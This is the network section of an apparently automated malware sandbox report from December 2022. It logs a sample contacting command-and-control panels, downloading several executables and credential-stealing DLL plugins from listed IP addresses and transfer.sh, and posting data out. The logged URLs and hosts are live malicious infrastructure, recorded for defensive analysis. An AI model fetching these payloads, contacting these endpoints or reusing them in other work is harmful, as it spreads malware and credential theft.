Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 144.76.136.153 | Active | Moloch |
| 148.251.234.83 | Active | Moloch |
| 149.28.253.196 | Active | Moloch |
| 164.124.101.2 | Active | Moloch |
| 185.106.92.214 | Active | Moloch |
| 23.160.193.16 | Active | Moloch |
| 31.41.244.14 | Active | Moloch |
| 31.41.244.188 | Active | Moloch |
| 31.41.244.237 | Active | Moloch |
| 31.41.244.253 | Active | Moloch |
| 62.204.41.6 | Active | Moloch |
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| iplogger.org | 148.251.234.83 | |
| transfer.sh | 144.76.136.153 | |
| www.aculpainting.com | 23.160.193.16 | |
| www.icodeps.com | 149.28.253.196 |
- TCP Requests
-
-
192.168.56.103:49209 144.76.136.153:80transfer.sh
-
192.168.56.103:49210 144.76.136.153:443transfer.sh
-
192.168.56.103:49211 144.76.136.153:443transfer.sh
-
192.168.56.103:49212 144.76.136.153:443transfer.sh
-
192.168.56.103:49214 144.76.136.153:443transfer.sh
-
192.168.56.103:49215 144.76.136.153:443transfer.sh
-
192.168.56.103:49216 144.76.136.153:443transfer.sh
-
192.168.56.103:49225 144.76.136.153:443transfer.sh
-
192.168.56.103:49226 144.76.136.153:443transfer.sh
-
192.168.56.103:49228 144.76.136.153:443transfer.sh
-
192.168.56.103:49197 148.251.234.83:443iplogger.org
-
192.168.56.103:49198 148.251.234.83:443iplogger.org
-
192.168.56.103:49199 148.251.234.83:443iplogger.org
-
192.168.56.103:49196 149.28.253.196:443www.icodeps.com
-
185.106.92.214:2515 192.168.56.103:49186
-
192.168.56.103:49193 23.160.193.16:80www.aculpainting.com
-
192.168.56.103:49182 31.41.244.14:4683
-
192.168.56.103:49184 31.41.244.188:80
-
192.168.56.103:49171 31.41.244.237:80
-
192.168.56.103:49172 31.41.244.237:80
-
192.168.56.103:49179 31.41.244.237:80
-
192.168.56.103:49173 31.41.244.253:80
-
192.168.56.103:49180 31.41.244.253:80
-
192.168.56.103:49187 62.204.41.6:80
-
192.168.56.103:49190 62.204.41.6:80
-
192.168.56.103:49191 62.204.41.6:80
-
192.168.56.103:49231 31.41.244.14:4683
-
192.168.56.103:49223 31.41.244.237:80
-
192.168.56.103:49203 31.41.244.253:80
-
192.168.56.103:49233 62.204.41.6:80
-
- UDP Requests
-
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:49154 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.103:53673
-
GET
200
https://www.icodeps.com/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: www.icodeps.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 08 Dec 2022 01:51:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
Access-Control-Allow-Origin: *
POST
200
http://31.41.244.237/jg94cVd30f/index.php
REQUEST
RESPONSE
BODY
POST /jg94cVd30f/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 31.41.244.237
Content-Length: 90
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:50:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://31.41.244.237/jg94cVd30f/index.php?scr=1
REQUEST
RESPONSE
BODY
POST /jg94cVd30f/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----ODcwNDA=
Host: 31.41.244.237
Content-Length: 87192
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:50:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://31.41.244.253/new/linda5.exe
REQUEST
RESPONSE
BODY
GET /new/linda5.exe HTTP/1.1
Host: 31.41.244.253
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:50:52 GMT
Content-Type: application/octet-stream
Content-Length: 1570725
Last-Modified: Thu, 08 Dec 2022 01:32:36 GMT
Connection: keep-alive
ETag: "63913eb4-17f7a5"
Accept-Ranges: bytes
POST
200
http://31.41.244.237/jg94cVd30f/index.php
REQUEST
RESPONSE
BODY
POST /jg94cVd30f/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 31.41.244.237
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:50:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://31.41.244.253/goga/nash.exe
REQUEST
RESPONSE
BODY
GET /goga/nash.exe HTTP/1.1
Host: 31.41.244.253
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:50:59 GMT
Content-Type: application/octet-stream
Content-Length: 179200
Last-Modified: Mon, 05 Dec 2022 21:37:49 GMT
Connection: keep-alive
ETag: "638e64ad-2bc00"
Accept-Ranges: bytes
POST
200
http://31.41.244.237/jg94cVd30f/index.php
REQUEST
RESPONSE
BODY
POST /jg94cVd30f/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 31.41.244.237
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:51:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://31.41.244.188/ano/anon.exe
REQUEST
RESPONSE
BODY
GET /ano/anon.exe HTTP/1.1
Host: 31.41.244.188
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:51:06 GMT
Content-Type: application/octet-stream
Content-Length: 179200
Last-Modified: Thu, 08 Dec 2022 00:06:32 GMT
Connection: keep-alive
ETag: "63912a88-2bc00"
Accept-Ranges: bytes
POST
200
http://31.41.244.237/jg94cVd30f/index.php
REQUEST
RESPONSE
BODY
POST /jg94cVd30f/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 31.41.244.237
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:51:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://62.204.41.6/newlege.exe
REQUEST
RESPONSE
BODY
GET /newlege.exe HTTP/1.1
Host: 62.204.41.6
HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:51:12 GMT
Content-Type: application/octet-stream
Content-Length: 247296
Connection: keep-alive
Last-Modified: Sat, 03 Dec 2022 14:17:36 GMT
ETag: "3c600-5eeed1dac336b"
Accept-Ranges: bytes
POST
200
http://62.204.41.6/p9cWxH/index.php
REQUEST
RESPONSE
BODY
POST /p9cWxH/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.6
Content-Length: 90
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:51:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
POST
200
http://62.204.41.6/p9cWxH/index.php?scr=1
REQUEST
RESPONSE
BODY
POST /p9cWxH/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----ODkyNDM=
Host: 62.204.41.6
Content-Length: 89395
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:51:16 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16
GET
302
http://www.aculpainting.com/mp3studios97/mp3studios_97.exe
REQUEST
RESPONSE
BODY
GET /mp3studios97/mp3studios_97.exe HTTP/1.1
Host: www.aculpainting.com
HTTP/1.1 302 Found
Server: nginx
Date: Thu, 08 Dec 2022 01:51:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.6.40
Location: http://www.aculpainting.com/mp3studios_97.exe
GET
200
http://www.aculpainting.com/mp3studios_97.exe
REQUEST
RESPONSE
BODY
GET /mp3studios_97.exe HTTP/1.1
Host: www.aculpainting.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 08 Dec 2022 01:51:14 GMT
Content-Type: application/octet-stream
Content-Length: 1493504
Last-Modified: Tue, 06 Dec 2022 06:13:00 GMT
Connection: keep-alive
ETag: "638edd6c-16ca00"
Accept-Ranges: bytes
POST
200
http://31.41.244.237/jg94cVd30f/index.php
REQUEST
RESPONSE
BODY
POST /jg94cVd30f/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 31.41.244.237
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:51:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://62.204.41.6/p9cWxH/index.php
REQUEST
RESPONSE
BODY
POST /p9cWxH/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.6
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:51:21 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16
GET
304
http://31.41.244.253/new/linda5.exe
REQUEST
RESPONSE
BODY
GET /new/linda5.exe HTTP/1.1
Host: 31.41.244.253
If-Modified-Since: Thu, 08 Dec 2022 01:32:36 GMT
If-None-Match: "63913eb4-17f7a5"
HTTP/1.1 304 Not Modified
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:51:22 GMT
Last-Modified: Thu, 08 Dec 2022 01:32:36 GMT
Connection: keep-alive
ETag: "63913eb4-17f7a5"
POST
200
http://62.204.41.6/p9cWxH/index.php
REQUEST
RESPONSE
BODY
POST /p9cWxH/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.6
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:51:27 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16
GET
301
http://transfer.sh/get/gI6LT0/loader.exe
REQUEST
RESPONSE
BODY
GET /get/gI6LT0/loader.exe HTTP/1.1
Host: transfer.sh
HTTP/1.1 301 Moved Permanently
Server: nginx/1.18.0
Date: Thu, 08 Dec 2022 01:51:28 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Location: https://transfer.sh/get/gI6LT0/loader.exe
GET
301
http://transfer.sh/get/gI6LT0/loader.exe
REQUEST
RESPONSE
BODY
GET /get/gI6LT0/loader.exe HTTP/1.1
Host: transfer.sh
HTTP/1.1 301 Moved Permanently
Server: nginx/1.18.0
Date: Thu, 08 Dec 2022 01:51:36 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Location: https://transfer.sh/get/gI6LT0/loader.exe
GET
200
http://31.41.244.237/jg94cVd30f/Plugins/cred64.dll
REQUEST
RESPONSE
BODY
GET /jg94cVd30f/Plugins/cred64.dll HTTP/1.1
Host: 31.41.244.237
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:51:42 GMT
Content-Type: application/octet-stream
Content-Length: 129024
Last-Modified: Wed, 07 Dec 2022 14:45:28 GMT
Connection: keep-alive
ETag: "6390a708-1f800"
Accept-Ranges: bytes
POST
200
http://31.41.244.237/jg94cVd30f/index.php
REQUEST
RESPONSE
BODY
POST /jg94cVd30f/index.php HTTP/1.1
Host: 31.41.244.237
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:51:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
GET
301
http://transfer.sh/get/gI6LT0/loader.exe
REQUEST
RESPONSE
BODY
GET /get/gI6LT0/loader.exe HTTP/1.1
Host: transfer.sh
HTTP/1.1 301 Moved Permanently
Server: nginx/1.18.0
Date: Thu, 08 Dec 2022 01:51:43 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Location: https://transfer.sh/get/gI6LT0/loader.exe
POST
200
http://62.204.41.6/p9cWxH/index.php
REQUEST
RESPONSE
BODY
POST /p9cWxH/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.6
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:51:50 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16
GET
200
http://31.41.244.253/miha/wish.exe
REQUEST
RESPONSE
BODY
GET /miha/wish.exe HTTP/1.1
Host: 31.41.244.253
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 08 Dec 2022 01:51:50 GMT
Content-Type: application/octet-stream
Content-Length: 179200
Last-Modified: Mon, 05 Dec 2022 21:37:33 GMT
Connection: keep-alive
ETag: "638e649d-2bc00"
Accept-Ranges: bytes
POST
200
http://62.204.41.6/p9cWxH/index.php
REQUEST
RESPONSE
BODY
POST /p9cWxH/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.6
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:51:56 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16
GET
200
http://62.204.41.6/p9cWxH/Plugins/cred64.dll
REQUEST
RESPONSE
BODY
GET /p9cWxH/Plugins/cred64.dll HTTP/1.1
Host: 62.204.41.6
HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:52:03 GMT
Content-Type: application/octet-stream
Content-Length: 129024
Connection: keep-alive
Last-Modified: Sat, 03 Dec 2022 13:47:00 GMT
ETag: "1f800-5eeecb04a4ba8"
Accept-Ranges: bytes
POST
200
http://62.204.41.6/p9cWxH/index.php
REQUEST
RESPONSE
BODY
POST /p9cWxH/index.php HTTP/1.1
Host: 62.204.41.6
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 08 Dec 2022 01:52:05 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.16
Refresh: 0; url = Login.php
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.103:49196 149.28.253.196:443 |
C=CN, O=TrustAsia Technologies, Inc., CN=TrustAsia RSA DV TLS CA G2 | CN=icodeps.com | 87:db:69:7b:62:f3:12:4a:c6:40:1e:05:07:04:95:6d:41:8c:f8:26 |
Snort Alerts
No Snort Alerts